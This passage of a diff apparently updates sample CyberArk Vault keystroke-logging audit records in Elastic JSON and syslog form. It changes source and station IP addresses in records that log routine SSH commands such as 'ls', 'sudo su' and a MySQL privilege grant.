 {"format":"elastic","version":"1.0","raw":"<syslog>\n  <audit_record>\n    <Rfc5424>no</Rfc5424>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.6.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>Linux</Safe>\n    <File>Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2</File>\n    <Station>10.2.0.7</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"LINUX-SSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"admin2\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"radiussrv.cyberark.local\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"No Reason\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"Customer\" Value=\"Tesla\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n</syslog>","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"361","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}}
-<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:49</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:32:04</Timestamp>\n    <IsoTimestamp>2021-03-15T10:32:04Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:33:47Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:47</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:47Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:35:08</Timestamp>\n    <IsoTimestamp>2021-03-15T10:35:08Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:11:18</Timestamp>\n    <IsoTimestamp>2021-03-15T14:11:18Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
-<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:45:51</Timestamp>\n    <IsoTimestamp>2021-03-15T14:45:51Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615819476\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:49</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=10T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:32:04</Timestamp>\n    <IsoTimestamp>2021-03-15T10:32:04Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo 